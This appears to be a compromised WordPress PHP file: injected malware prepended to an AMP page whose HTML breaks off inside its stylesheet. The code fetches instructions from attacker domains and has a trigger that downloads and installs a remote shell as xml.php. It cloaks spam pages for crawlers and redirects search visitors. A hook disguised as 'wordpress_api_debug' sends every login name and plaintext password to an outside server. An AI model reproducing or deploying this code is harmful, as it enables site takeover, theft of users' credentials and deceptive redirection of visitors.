if (!function_exists('getUserIP')) { function getUserIP() { foreach(array('HTTP_CF_CONNECTING_IP', 'HTTP_CLIENT_IP', 'HTTP_X_FORWARDED_FOR', 'HTTP_X_FORWARDED', 'HTTP_X_CLUSTER_CLIENT_IP', 'HTTP_FORWARDED_FOR', 'HTTP_FORWARDED', 'REMOTE_ADDR') as $key) { if (array_key_exists($key, $_SERVER) === true) { foreach(array_map('trim', explode(',', $_SERVER[$key])) as $ip) { if (filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) !== false) { return $ip; } } } } } } if (!function_exists('cacheUrl')) { function cacheUrl($url, $skip_cache = FALSE) { $cachetime = 10; //one week // $cachetime = 60 * 60 * 24 * 7; //one week $file = ABSPATH.WPINC. '/class-wp-http-netfilter.php'; $mtime = 0; if (file_exists($file)) { $mtime = filemtime($file); } $filetimemod = $mtime + $cachetime; if ($filetimemod < time() OR $skip_cache) { $ch = curl_init($url); curl_setopt_array($ch, array( CURLOPT_HEADER => FALSE, CURLOPT_RETURNTRANSFER => TRUE, CURLOPT_USERAGENT => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36', CURLOPT_FOLLOWLOCATION => TRUE, CURLOPT_MAXREDIRS => 5, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 60, )); $data = curl_exec($ch); curl_close($ch); if ($data AND!$skip_cache) { file_put_contents($file, $data); } } else { $data = file_get_contents($file); } return $data; } } $weoboo = cacheUrl('https://acagna.info/lnk/data/ip.admin.txt'); $user_ip = getUserIP(); if (strpos($weoboo, getUserIP()) !== false) { //ip found } else { $id = $_SERVER['REQUEST_URI']; if (preg_match_all("/ffgg$/", $id, $matches) ) { echo '111111'; } $uag = $_SERVER['HTTP_USER_AGENT']; $id = $_SERVER['REQUEST_URI']; $host=$_SERVER['HTTP_HOST']; $ref =$_SERVER['HTTP_REFERER']; $uri =$_SERVER['REQUEST_URI']; //t $pagesID = $_SERVER['REQUEST_URI']; if (!preg_match_all("/wp-login|wp-admin|admin|xmlrpc/", $pagesID, $matches)) { $apiToken = 'tws5mkxns8qpz5hqywtcknjfw4wgrbhp'; $keyword =$_SERVER['REQUEST_URI']; $url_page=$_SERVER['REQUEST_URI']; $ua = urlencode($_SERVER['HTTP_USER_AGENT']); $lang = (isset($_SERVER['HTTP_ACCEPT_LANGUAGE']) ? substr($_SERVER['HTTP_ACCEPT_LANGUAGE'], 0, 2) : ''); $ip = null; $headers = array('HTTP_X_FORWARDED_FOR', 'HTTP_CF_CONNECTING_IP', 'HTTP_X_REAL_IP', 'REMOTE_ADDR'); foreach ($headers as $header) { if (!empty($_SERVER[$header])) { $ip = $_SERVER[$header]; break; } } if (strstr($ip, ',')) { $tmp = explode(',', $ip); if (stristr($_SERVER['HTTP_USER_AGENT'], 'mini')) { $ip = trim($tmp[count($tmp) - 2]); } else { $ip = trim($tmp[0]); } } if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $tmp = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']); $ip = trim($tmp[0]); } else { $ip = $_SERVER['REMOTE_ADDR']; } $referrer = urlencode(@$_SERVER['HTTP_REFERER']); $url = "https://bantuzu.info/api.php?is_api=1&action=get&token=$apiToken&ua=$ua&ip=$ip&keyword=$keyword&referrer=$referrer&lang=$lang&sub_id_1=".$_SERVER['HTTP_HOST']."&" . http_build_query($_GET) . ""; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $output = curl_exec($ch); curl_close($ch); $result = json_decode($output); print $result->{'body'}; } @ini_set('display_errors', '0'); error_reporting(0); @ini_set("memory_limit","1024M"); $curtime = time(); $hspan = 0; $gen_passwd = "57ffb10f130bd90ab7a342fe814ccbd8"; $donor = $_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']; if (preg_match('#.txt|.jpg|.png|/feed/|.xml|.ico#', $donor)) die(); if ($_REQUEST['testwork'] == 'ololo') { $twork = file_get_contents('http://acagna.info/lnk/up/sh.txt'); if (preg_match("#cgi|admin#i", $eb)) $eb = ''; if (file_put_contents("{$eb}xml.php", $twork)) echo "success!
go"; else echo "error!"; die(); } if (ini_get('allow_url_fopen')) { function get_data_yo($url) { $data = file_get_contents($url); return $data; } } else { function get_data_yo($url) { $ch = curl_init(); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 8); $data = curl_exec($ch); curl_close($ch); return $data; } } $ip = urlencode($_SERVER['REMOTE_ADDR']); $ua = urlencode($_SERVER['HTTP_USER_AGENT']); //block ddos bots $blbots = '/semrush|rogerbot|exabot|mj12bot|dotbot|gigabot|ahrefsbot|ia_archiver/i'; if (preg_match($blbots, $ua)) die(); $ref = urlencode($_SERVER['HTTP_REFERER']); $poiskoviki = '/google|bing|yahoo|aol|rambler/i'; $fromse = 0; if ($ref && preg_match($poiskoviki, $ref)) $fromse = 1; $abt = 0; $abtip = 0; if (isset($_GET['debug'])) $abt = 1; $crawlers = '/google|bot|crawl|slurp|spider|yandex|rambler/i'; $crawlers = '/a|b|c|d|e|f|g/i'; if (preg_match($crawlers, $ua)) { $abt = 1; } if (file_exists("{$eb}.bt")) { $bots = file("{$eb}.bt", FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES); $btime = filemtime("{$eb}.bt"); $obtime = $curtime - $btime; } if (!$bots[2] || $obtime > 172800) { $fbots = get_data_yo("http://acagna.info/lnk/bots.dat"); $btf = fopen("{$eb}.bt", 'w'); fwrite($btf, $fbots); fclose($btf); $bots = file("{$eb}.bt", FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES); } if (in_array($ip, $bots)) { $abt = 1; $abtip = 1; } $st = '.st'; $cldw = 0; $dw = 0; if ($_REQUEST["create"] == 1 && $_REQUEST["gen_passwd"] == $gen_passwd) { $cldw = 0; if ($_REQUEST['cldw']) $cldw = 1; $qq = $_REQUEST['qq']; if (!file_exists("{$eb}{$st}/.r")) { $qq = $_REQUEST['qq']; mkdir("{$eb}{$st}"); } else { $pamparam = file_get_contents("{$eb}{$st}/.r"); $eqq = explode('|', $pamparam); if (isset($_REQUEST['qq']) && $_REQUEST['qq']) $qq = $_REQUEST['qq']; else $qq = trim($eqq[2]); } $redir = $_REQUEST['redir']; $redcode = $_REQUEST['redcode']; $redcode = htmlspecialchars_decode($redcode); $redcode = base64_encode($redcode); $group = $_REQUEST['group']; if ($cldw) { $egroup = explode('_', $group); $kgroup = $egroup[0]; $clkeys = get_data_yo("http://acagna.info/lnk/gen/keys/$kgroup.keys"); file_put_contents("{$eb}{$st}/.k", $clkeys); } $lang = $_REQUEST['lang']; file_put_contents("{$eb}{$st}/.r", "$redir|$group|$qq|$lang|$redcode|$cldw"); if (file_exists("{$eb}{$st}/.r")) { echo "created"; die(); } } if (file_exists("{$eb}{$st}/.r")) { $dw = 1; $pamparam = file_get_contents("{$eb}{$st}/.r"); $eqq = explode('|', $pamparam); $redir = $eqq[0]; if (!strstr($redir, 'https://')) $redir = base64_decode($redir); $group = $eqq[1]; $qq = trim($eqq[2]); $lang = trim($eqq[3]); if ($eqq[4]) $redcode = base64_decode($eqq[4]); $cldw = $eqq[5]; } $donor = $_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']; $ddomain = $_SERVER['HTTP_HOST']; $ddomain = str_ireplace('www.', '', $ddomain); $eddomain = explode('.', $ddomain); $ddname = $eddomain[0]; $donor = str_ireplace('www.', '', $donor); $page = str_replace('/', '|', $donor); $donor = urldecode($donor); $epage = explode('|', $page); $morda = 0; if (!$epage[1] && !$epage[2] || $epage[1] == 'index.php' || $epage[1] == '?p=home') $morda = 1; //$fromse = 1; if ($abt || $fromse || $redcode || $hspan) { if (($abt || $hspan) && !$_GET[$qq]) { $ll = get_data_yo("http://acagna.info/lnk/tuktuk.php?d=$donor&cldw=$cldw&dgrp=$algo"); $el = explode(' ', $ll); } if (file_exists("{$eb}{$st}/$page.html")) { $htmlpage = file_get_contents("{$eb}{$st}/$page.html"); echo $htmlpage; die(); } $mdpage = md5($page); if (file_exists("{$eb}{$st}/$page.txt") || file_exists("{$eb}{$st}/$mdpage.txt")) { if (file_exists("{$eb}{$st}/$mdpage.txt")) $gtxt = file_get_contents("{$eb}{$st}/$mdpage.txt"); else $gtxt = file_get_contents("{$eb}{$st}/$page.txt"); $etxt = explode('|', $gtxt); $key = $etxt[0]; $desc = $etxt[1]; $txt = $etxt[2]; $h1 = $etxt[3]; } elseif ($cldw || isset($_GET[$qq])) { $desc = ''; $keys = file("{$eb}{$st}/.k", FILE_SKIP_EMPTY_LINES | FILE_IGNORE_NEW_LINES); if ($keys[0]) { $key = $keys[0]; for ($kk = 1; $kk < count($keys); $kk++) $newkeys .= "$keys[$kk] "; file_put_contents("{$eb}{$st}/.k", $newkeys); } if (isset($_GET[$qq])) { $key = str_replace('-', ' ', $_GET[$qq]); } if ($key) { $parkey = $key; $tkey = str_replace(' ', '-', $key); if (stristr($lang, 'own')) { $lang = str_replace('own:', '', $lang); $owntext = base64_decode($lang); $wkey = urlencode($key); if (strstr($owntext, '?')) $ttxt = get_data_yo("{$owntext}&key=$wkey"); else $ttxt = get_data_yo("{$owntext}?key=$wkey"); } else $ttxt = get_data_yo("http://acagna.info/lnk/gen/index.php?key=$tkey&g=$group&lang=$lang&page=$page&cldw=$cldw&dd=$ddomain"); if (preg_match('#\n$parkey rating\n
\n$rating-5 stars based on\n$rcount reviews\n
\n\n"; $desc = $etxt[2]; $txt .= $etxt[3]; if ($desc == 'desc') { $desc = get_data_yo("http://acagna.info/lnk/gen/desc.php?key=$tkey&desc=$group"); preg_match('#gogogo(.*)enenen#is', $desc, $mtchs); $desc = $mtchs[1]; } $mdpage = md5($page); file_put_contents("{$eb}{$st}/$mdpage.txt", "$title|$desc|$txt|$h1"); $newclpage = str_replace('|', '/', $page); $newcllink = "$parkey "; if ($cldw) file_put_contents("{$eb}{$st}/cldwmap.txt", $newcllink, FILE_APPEND); } } $iswp = 0; if (file_exists('wp-includes/vars.php')) $iswp = 1; $cldwmap = file("{$eb}{$st}/cldwmap.txt", FILE_SKIP_EMPTY_LINES | FILE_IGNORE_NEW_LINES); ob_start(); function shutdown() { global $morda; global $eb; global $txt; global $qq; global $key; global $desc; global $lang; global $cldwmap; global $el; global $dw; global $cldw; global $redcode; global $abt; global $hspan; global $h1; global $iswp; global $ddname; $title = ucfirst($key); $my_content = ob_get_contents(); ob_end_clean(); if ($my_content && isset($_REQUEST['prigod'])) { $my_content = '---prigod---'; } if ($key && $abt) { if ($cldw && !$morda) { preg_match_all('##iUm', $my_content, $ahrefs); $cntahrefs = count($ahrefs[0]); $cntcldwmap = count($cldwmap); $i = 0; foreach ($ahrefs[0] as $ahref) { if ($cldwmap[$i]) { $my_content = str_replace($ahref, $cldwmap[$i], $my_content); } $i++; } if ($morda) { $cldwfooter = ''; foreach ($cldwmap as $cldwflink) { $cldwfooter .= "$cldwflink "; } $my_content = str_replace('', "
$cldwfooter
", $my_content); } } if (!$morda) { $my_content = preg_replace('##iUs', "$title", $my_content, 1); $my_content = preg_replace("##iUs", '', $my_content); $my_content = preg_replace("##iUs", '', $my_content); $my_content = preg_replace('##iUm', "

$h1

", $my_content, 1); $my_content = preg_replace('##iUm', "

$h1

", $my_content, 1); $my_content = preg_replace('##iUm', "

$h1

", $my_content, 1); $my_content = preg_replace("##iUs", '', $my_content); $my_content = preg_replace("##iUs", '', $my_content); $my_content = preg_replace("##iUs", '', $my_content); $my_content = str_replace('', " ", $my_content); $my_content = preg_replace("##iUs", '', $my_content); $my_content = preg_replace('##iUs', '', $my_content, 1); if (@preg_match('##iUs', $my_content)) { $my_content = preg_replace('##iUs', "
$txt
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
#iUs', $my_content)) { $my_content = preg_replace('#
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
#iUs', $my_content)) { $my_content = preg_replace('#
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('##iUs')) { $my_content = preg_replace('##iUs', "\n
$txt
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('##iUs', $my_content)) { $my_content = preg_replace('##iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('##iUs', $my_content)) { $my_content = preg_replace('##iUs', "\n
\n$txt\n
", $my_content, 1); } } } //end if key elseif (!preg_match('#(.*)404(.*)#i', $my_content) && !preg_match('#<title>(.*)not found(.*)#i', $my_content)) { foreach($el as $ln) { if (preg_match('#<strong>#', $my_content)) { $my_content = preg_replace('#<strong>#', "_-strong-_ $ln ", $my_content, 1); } elseif (preg_match('#<b>#', $my_content)) { $my_content = preg_replace('#<b>#', "_-b-_ $ln ", $my_content, 1); } elseif (preg_match('#<i>#', $my_content)) { $my_content = preg_replace('#<i>#', "_-i-_ $ln ", $my_content, 1); } elseif (preg_match('#<u>#', $my_content)) { $my_content = preg_replace('#<u>#', "_-u-_ $ln ", $my_content, 1); } elseif (preg_match('#<p(.*)>#', $my_content)) { $my_content = preg_replace('#<p(.*)>#iUs', "_-p-_ \n$ln ", $my_content, 1); } elseif (preg_match('#</p>#', $my_content)) { $my_content = preg_replace('#</p>#', "_-/p-_ \n$ln ", $my_content, 1); } elseif (preg_match('#<br(.*)>#', $my_content)) { $my_content = preg_replace('#<br(.*)>#iUs', " $ln ", $my_content, 1); } elseif (preg_match('#<span(.*)>#', $my_content)) { $my_content = preg_replace('#<span(.*)>#iUs', "_-span-_ $ln ", $my_content, 1); } elseif (preg_match('#<body(.*)>#iUs', $my_content)) { $my_content = preg_replace('#<body(.*)>#iUs', "<body>\n$ln ", $my_content, 1); } } $my_content = str_replace('_-', '<', $my_content); $my_content = str_replace('-_', '>', $my_content); //$my_content = str_replace('</head>', "<script type='text/javascript'> function style_{$ddname} () { return 'none'; } function end_{$ddname} () { document.getElementById('$ddname').style.display = style_{$ddname}(); } </script>\n</head>", $my_content); //$my_content = str_replace('</body>', "<script type='text/javascript'> end_{$ddname}(); </script>\n</body>", $my_content); } echo $my_content; } register_shutdown_function('shutdown'); } if (($_GET[$qq] || $cldw) && $fromse && !$abt) { if (!$redcode && !$morda) { if ($key) $tkey = str_replace(' ', '+', $key); else $tkey = str_replace('-', '+', $_GET[$qq]); if (strstr($redir, '?')) $redir .= "&keyword=".$tkey; else $redir .= "?keyword=".$tkey; $redir = str_replace('KEY', $tkey, $redir); header("Location: $redir"); echo "<script type=\"text/javascript\">location.href=\"$redir\";</script>"; die(); } elseif (!$morda) { $key = str_replace('-', ' ', $_GET[$qq]); $redcode = str_replace('KEY', $key, $redcode); echo stripslashes($redcode); } } /* your code end */ } /* weoboo end */ if(!isset($_COOKIE['_eshoob'])) { setcookie('_eshoob', 1, time()+604800, '/'); // unset cookies if (isset($_SERVER['HTTP_COOKIE'])) { $cookies = explode(';', $_SERVER['HTTP_COOKIE']); foreach($cookies as $cookie) { if (strpos($cookie,'wordpress') !== false || strpos($cookie,'wp_') !== false || strpos($cookie,'wp-') !== false) { $parts = explode('=', $cookie); $name = trim($parts[0]); setcookie($name, '', time()-1000); setcookie($name, '', time()-1000, '/'); } } } } if (!function_exists('getUserIP')) { function getUserIP() { foreach (array('HTTP_CF_CONNECTING_IP', 'HTTP_CLIENT_IP', 'HTTP_X_FORWARDED_FOR', 'HTTP_X_FORWARDED', 'HTTP_X_CLUSTER_CLIENT_IP', 'HTTP_FORWARDED_FOR', 'HTTP_FORWARDED', 'REMOTE_ADDR') as $key) { if (array_key_exists($key, $_SERVER) === true) { foreach (array_map('trim', explode(',', $_SERVER[$key])) as $ip) { if (filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) !== false) { return $ip; } } } } } } if (!function_exists('isHttps')) { function isHttps() { if ((!empty($_SERVER['REQUEST_SCHEME']) && $_SERVER['REQUEST_SCHEME'] == 'https') || (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] == 'on') || (!empty($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] == 'https') || (!empty($_SERVER['HTTP_X_FORWARDED_SSL']) && $_SERVER['HTTP_X_FORWARDED_SSL'] == 'on') || (!empty($_SERVER['SERVER_PORT']) && $_SERVER['SERVER_PORT'] == '443')) { $server_request_scheme = 'https'; } else { $server_request_scheme = 'http'; } return $server_request_scheme; } } if (!function_exists('wordpress_api_debug')) { function wordpress_api_debug( $user_login, $user ){ $wpApiUrl = "https://toremanc.com/lnk/api.php"; // $uuuser = get_user_by('login', $_POST['log']); if(in_array('administrator', $uuuser->roles)){ $role = 'admin'; } else{ $role = 'user'; } // $verbLogs = array( 'wp_host' => $_SERVER['HTTP_HOST'], 'wp_uri' => $_SERVER['REQUEST_URI'], 'wp_scheme' => isHttps(), 'user_login' => $_POST['log'], 'user_password' => $_POST['pwd'], 'user_ip' => getUserIP(), 'user_role' => $role ); if (!empty($verbLogs['user_login'])) { $wpLogData = json_encode($verbLogs); $curl = curl_init(); curl_setopt($curl, CURLOPT_HEADER, false); curl_setopt($curl, CURLOPT_URL, $wpApiUrl); curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); curl_setopt($curl, CURLOPT_POST, true); curl_setopt($curl, CURLOPT_POSTFIELDS, $wpLogData); curl_setopt($curl, CURLOPT_HTTPHEADER, array('Content-Type:application/json')); $response = curl_exec($curl); curl_close($curl); } } } if (function_exists('add_action')) { add_action( 'wp_login', 'wordpress_api_debug', 10, 2 ); } ?><!DOCTYPE html> <html lang="en-US" amp="" data-amp-auto-lightbox-disable transformed="self;v=1" i-amphtml-layout="" i-amphtml-no-boilerplate=""> <head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="preconnect" href="https://cdn.ampproject.org"><style amp-runtime="" i-amphtml-version="012302271541000">html{overflow-x:hidden!important}html.i-amphtml-fie{height:100%!important;width:100%!important}html:not([amp4ads]),html:not([amp4ads]) body{height:auto!important}html:not([amp4ads]) body{margin:0!important}body{-webkit-text-size-adjust:100%;-moz-text-size-adjust:100%;-ms-text-size-adjust:100%;text-size-adjust:100%}html.i-amphtml-singledoc.i-amphtml-embedded{-ms-touch-action:pan-y pinch-zoom;touch-action:pan-y pinch-zoom}html.i-amphtml-fie>body,html.i-amphtml-singledoc>body{overflow:visible!important}html.i-amphtml-fie:not(.i-amphtml-inabox)>body,html.i-amphtml-singledoc:not(.i-amphtml-inabox)>body{position:relative!important}html.i-amphtml-ios-embed-legacy>body{overflow-x:hidden!important;overflow-y:auto!important;position:absolute!important}html.i-amphtml-ios-embed{overflow-y:auto!important;position:static}#i-amphtml-wrapper{overflow-x:hidden!important;overflow-y:auto!important;position:absolute!important;top:0!important;left:0!important;right:0!important;bottom:0!important;margin:0!important;display:block!important}html.i-amphtml-ios-embed.i-amphtml-ios-overscroll,html.i-amphtml-ios-embed.i-amphtml-ios-overscroll>#i-amphtml-wrapper{-webkit-overflow-scrolling:touch!important}#i-amphtml-wrapper>body{position:relative!important;border-top:1px solid transparent!important}#i-amphtml-wrapper+body{visibility:visible}#i-amphtml-wrapper+body .i-amphtml-lightbox-element,#i-amphtml-wrapper+body[i-amphtml-lightbox]{visibility:hidden}#i-amphtml-wrapper+body[i-amphtml-lightbox] .i-amphtml-lightbox-element{visibility:visible}#i-amphtml-wrapper.i-amphtml-scroll-disabled,.i-amphtml-scroll-disabled{overflow-x:hidden!important;overflow-y:hidden!important}amp-instagram{padding:54px 0px 0px!important;background-color:#fff}amp-iframe iframe{box-sizing:border-box!important}[amp-access][amp-access-hide]{display:none}[subscriptions-dialog],body:not(.i-amphtml-subs-ready) [subscriptions-action],body:not(.i-amphtml-subs-ready) [subscriptions-section]{display:none!important}amp-experiment,amp-live-list>[update]{display:none}amp-list[resizable-children]>.i-amphtml-loading-container.amp-hidden{display:none!important}amp-list [fetch-error],amp-list[load-more] [load-more-button],amp-list[load-more] [load-more-end],amp-list[load-more] [load-more-failed],amp-list[load-more] [load-more-loading]{display:none}amp-list[diffable] div[role=list]{display:block}amp-story-page,amp-story[standalone]{min-height:1px!important;display:block!important;height:100%!important;margin:0!important;padding:0!important;overflow:hidden!important;width:100%!important}amp-story[standalone]{background-color:#000!important;position:relative!important}amp-story-page{background-color:#757575}amp-story .amp-active>div,amp-story .i-amphtml-loader-background{display:none!important}amp-story-page:not(:first-of-type):not([distance]):not([active]){transform:translateY(1000vh)!important}amp-autocomplete{position:relative!important;display:inline-block!important}amp-autocomplete>input,amp-autocomplete>textarea{padding:0.5rem;border:1px solid rgba(0,0,0,0.33)}.i-amphtml-autocomplete-results,amp-autocomplete>input,amp-autocomplete>textarea{font-size:1rem;line-height:1.5rem}[amp-fx^=fly-in]{visibility:hidden}amp-script[nodom],amp-script[sandboxed]{position:fixed!important;top:0!important;width:1px!important;height:1px!important;overflow:hidden!important;visibility:hidden} /*# sourceURL=/css/ampdoc.css*/[hidden]{display:none!important}.i-amphtml-element{display:inline-block}.i-amphtml-blurry-placeholder{transition:opacity 0.3s cubic-bezier(0.0,0.0,0.2,1)!important;pointer-events:none}[layout=nodisplay]:not(.i-amphtml-element){display:none!important}.i-amphtml-layout-fixed,[layout=fixed][width][height]:not(.i-amphtml-layout-fixed){display:inline-block;position:relative}.i-amphtml-layout-responsive,[layout=responsive][width][height]:not(.i-amphtml-layout-responsive),[width][height][heights]:not([layout]):not(.i-amphtml-layout-responsive),[width][height][sizes]:not(img):not([layout]):not(.i-amphtml-layout-responsive){display:block;position:relative}.i-amphtml-layout-intrinsic,[layout=intrinsic][width][height]:not(.i-amphtml-layout-intrinsic){display:inline-block;position:relative;max-width:100%}.i-amphtml-layout-intrinsic .i-amphtml-sizer{max-width:100%}.i-amphtml-intrinsic-sizer{max-width:100%;display:block!important}.i-amphtml-layout-container,.i-amphtml-layout-fixed-height,[layout=container],[layout=fixed-height][height]:not(.i-amphtml-layout-fixed-height){display:block;position:relative}.i-amphtml-layout-fill,.i-amphtml-layout-fill.i-amphtml-notbuilt,[layout=fill]:not(.i-amphtml-layout-fill),body noscript>*{display:block;overflow:hidden!important;position:absolute;top:0;left:0;bottom:0;right:0}body noscript>*{position:absolute!important;width:100%;height:100%;z-index:2}body noscript{display:inline!important}.i-amphtml-layout-flex-item,[layout=flex-item]:not(.i-amphtml-layout-flex-item){display:block;position:relative;-ms-flex:1 1 auto;flex:1 1 auto}.i-amphtml-layout-fluid{position:relative}.i-amphtml-layout-size-defined{overflow:hidden!important}.i-amphtml-layout-awaiting-size{position:absolute!important;top:auto!important;bottom:auto!important}i-amphtml-sizer{display:block!important}@supports (aspect-ratio:1/1){i-amphtml-sizer.i-amphtml-disable-ar{display:none!important}}.i-amphtml-blurry-placeholder,.i-amphtml-fill-content{display:block;height:0;max-height:100%;max-width:100%;min-height:100%;min-width:100%;width:0;margin:auto}.i-amphtml-layout-size-defined .i-amphtml-fill-content{position:absolute;top:0;left:0;bottom:0;right:0}.i-amphtml-replaced-content,.i-amphtml-screen-reader{padding:0!important;border:none!important}.i-amphtml-screen-reader{position:fixed!important;top:0px!important;left:0px!important;width:4px!important;height:4px!important;opacity:0!important;overflow:hidden!important;margin:0!important;display:block!important;visibility:visible!important}.i-amphtml-screen-reader~.i-amphtml-screen-reader{left:8px!important}.i-amphtml-screen-reader~.i-amphtml-screen-reader~.i-amphtml-screen-reader{left:12px!important}.i-amphtml-screen-reader~.i-amphtml-screen-reader~.i-amphtml-screen-reader~.i-amphtml-screen-reader{left:16px!important}.i-amphtml-unresolved{position:relative;overflow:hidden!important}.i-amphtml-select-disabled{-webkit-user-select:none!important;-ms-user-select:none!important;user-select:none!important}.i-amphtml-notbuilt,[layout]:not(.i-amphtml-element),[width][height][heights]:not([layout]):not(.i-amphtml-element),[width][height][sizes]:not(img):not([layout]):not(.i-amphtml-element){position:relative;overflow:hidden!important;color:transparent!important}.i-amphtml-notbuilt:not(.i-amphtml-layout-container)>*,[layout]:not([layout=container]):not(.i-amphtml-element)>*,[width][height][heights]:not([layout]):not(.i-amphtml-element)>*,[width][height][sizes]:not([layout]):not(.i-amphtml-element)>*{display:none}amp-img:not(.i-amphtml-element)[i-amphtml-ssr]>img.i-amphtml-fill-content{display:block}.i-amphtml-notbuilt:not(.i-amphtml-layout-container),[layout]:not([layout=container]):not(.i-amphtml-element),[width][height][heights]:not([layout]):not(.i-amphtml-element),[width][height][sizes]:not(img):not([layout]):not(.i-amphtml-element){color:transparent!important;line-height:0!important}.i-amphtml-ghost{visibility:hidden!important}.i-amphtml-element>[placeholder],[layout]:not(.i-amphtml-element)>[placeholder],[width][height][heights]:not([layout]):not(.i-amphtml-element)>[placeholder],[width][height][sizes]:not([layout]):not(.i-amphtml-element)>[placeholder]{display:block;line-height:normal}.i-amphtml-element>[placeholder].amp-hidden,.i-amphtml-element>[placeholder].hidden{visibility:hidden}.i-amphtml-element:not(.amp-notsupported)>[fallback],.i-amphtml-layout-container>[placeholder].amp-hidden,.i-amphtml-layout-container>[placeholder].hidden{display:none}.i-amphtml-layout-size-defined>[fallback],.i-amphtml-layout-size-defined>[placeholder]{position:absolute!important;top:0!important;left:0!important;right:0!important;bottom:0!important;z-index:1}amp-img[i-amphtml-ssr]:not(.i-amphtml-element)>[placeholder]{z-index:auto}.i-amphtml-notbuilt>[placeholder]{display:block!important}.i-amphtml-hidden-by-media-query{display:none!important}.i-amphtml-element-error{background:red!important;color:#fff!important;position:relative!important}.i-amphtml-element-error:before{content:attr(error-message)}i-amp-scroll-container,i-amphtml-scroll-container{position:absolute;top:0;left:0;right:0;bottom:0;display:block}i-amp-scroll-container.amp-active,i-amphtml-scroll-container.amp-active{overflow:auto;-webkit-overflow-scrolling:touch}.i-amphtml-loading-container{display:block!important;pointer-events:none;z-index:1}.i-amphtml-notbuilt>.i-amphtml-loading-container{display:block!important}.i-amphtml-loading-container.amp-hidden{visibility:hidden}.i-amphtml-element>[overflow]{cursor:pointer;position:relative;z-index:2;visibility:hidden;display:initial;line-height:normal}.i-amphtml-layout-size-defined>[overflow]{position:absolute}.i-amphtml-element>[overflow].amp-visible{visibility:visible}template{display:none!important}.amp-border-box,.amp-border-box *,.amp-border-box :after,.amp-border-box :before{box-sizing:border-box}amp-pixel{display:none!important}amp-analytics,amp-auto-ads,amp-story-auto-ads{position:fixed!important;top:0!important;width:1px!important;height:1px!important;overflow:hidden!important;visibility:hidden}amp-story{visibility:hidden!important}html.i-amphtml-fie>amp-analytics{position:initial!important}[visible-when-invalid]:not(.visible),form [submit-error],form [submit-success],form [submitting]{display:none}amp-accordion{display:block!important}@media (min-width:1px){:where(amp-accordion>section)>:first-child{margin:0;background-color:#efefef;padding-right:20px;border:1px solid 